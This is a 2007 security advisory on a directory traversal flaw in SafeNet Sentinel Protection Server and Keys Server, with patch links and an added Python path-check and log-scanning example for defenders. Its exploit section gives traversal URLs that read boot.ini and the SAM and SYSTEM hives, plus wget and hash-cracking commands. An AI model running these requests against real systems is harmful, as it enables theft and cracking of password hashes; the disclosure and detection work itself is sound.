[NT] SafeNet Sentinel Protection Server and Keys Server Directory Traversal

Subject: [NT] SafeNet Sentinel Protection Server and Keys Server Directory Traversal
Date: 27 Nov 2007 11:51:28 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  SafeNet Sentinel Protection Server and Keys Server Directory Traversal
------------------------------------------------------------------------


SUMMARY

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server 
products include web servers which are vulnerable to directory traversal 
attacks. A remote attacker could exploit these vulnerabilities to read 
arbitrary files with the permissions of the web server, typically SYSTEM.

DETAILS

Vulnerable Systems:
 * Sentinel Protection Server version 7.0.0 through version 7.4.0 and possibly below
 * Sentinel Keys Server version 1.0.3 and possibly below

Immune Systems:
 * Sentinel Protection Server version 7.4.1
 * Sentinel Keys Server version 1.0.4

Sentinel Protection Server and Sentinel Keys Server run web servers on 
ports 6002 and 7002, respectively, to allow remote monitoring of key use. 
The web server software does not sanitize request paths correctly before 
using them in system calls. As a result, an attacker can request files 
outside the web server's document root by using the ../ notation to refer 
to the parent directory of the current directory.

Impact:
A remote attacker could exploit this vulnerability to read sensitive files 
on the affected system. Attractive targets include the SAM registry hive 
which contains system password hashes.

Solution:
Upgrade to Sentinel Protection Server version 7.4.1 and Sentinel Keys 
Server version 1.0.4.

First upgrade the Sentinel Driver software to version 7.4.0 if you are 
using an earlier version:
http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip

Then install "Security Patch to Sentinel Protection Installer 7.4.0":
http://safenet-inc.com/support/files/SPI740SecurityPatch.zip

Exploit:
Most popular web browsers are not able to display URLs exploiting this 
problem. We recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection Server.

This example will retrieve the C:\boot.ini file.
http://XX.XX.XX.XX:6002/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry hive 
from the Windows repair folder:
http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the 
system's local password hashes for offline cracking. For example, using 
the bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes
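As an added, defender-side example that is not part of the advisory: a Python check that resolves a request path against the document root the way an unsanitized server would (concatenate, let `..` collapse) and refuses anything that lands outside it, plus a scan over constructed log lines that flags the boot.ini and repair\sam requests shown above on ports 6002 and 7002. The document root, the log line format and its trailing port field are assumptions, not the product's real values.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed placeholder for the web server's document root; the advisory
# does not give the product's real install path.
WEB_ROOT = "/opt/sentinel/www"

def decode_path(raw):
    """Percent-decode until stable (catches %252e double encoding); treat '\\' as '/'."""
    prev, cur = None, raw
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/")

def resolve_under_root(root, request_path):
    """Resolve a request path the way an unsanitized server does (concatenate,
    let '..' collapse) and return it, or None if it ended up outside root."""
    decoded = decode_path(request_path.split("?", 1)[0])
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(root_norm + "/" + decoded.lstrip("/"))
    if candidate == root_norm or candidate.startswith(root_norm + "/"):
        return candidate
    return None

# Request line plus a trailing ':port' field; the field is an assumption about
# how the listening port is recorded, not the product's real log format.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" \d+ :(\d+)$')

def find_traversal_requests(log_text, root=WEB_ROOT, ports=(6002, 7002)):
    """Return (line_no, port, decoded_path) for requests on a Sentinel port
    whose path resolves outside the document root."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, port = m.group(1), int(m.group(2))
        if port in ports and resolve_under_root(root, path) is None:
            hits.append((n, port, decode_path(path)))
    return hits

# Constructed sample log lines, not real Sentinel output.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Nov/2007:11:51:28 +0200] "GET /index.html HTTP/1.0" 200 :6002
10.0.0.9 - - [27/Nov/2007:11:52:01 +0200] "GET /../../../../../../boot.ini HTTP/1.0" 200 :6002
10.0.0.9 - - [27/Nov/2007:11:52:07 +0200] "GET /%2e%2e/%2e%2e/%2e%2e/winnt/repair/sam HTTP/1.0" 200 :7002
10.0.0.7 - - [27/Nov/2007:11:53:00 +0200] "GET /../../etc/passwd HTTP/1.0" 404 :8080
"""
```

The request on port 8080 is deliberately ignored so the scan stays focused on the two Sentinel listeners; widen `ports` to audit other services with the same check.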


ADDITIONAL INFORMATION

The information has been provided by Elliot Kendall <ekendall@brandeis.edu>.


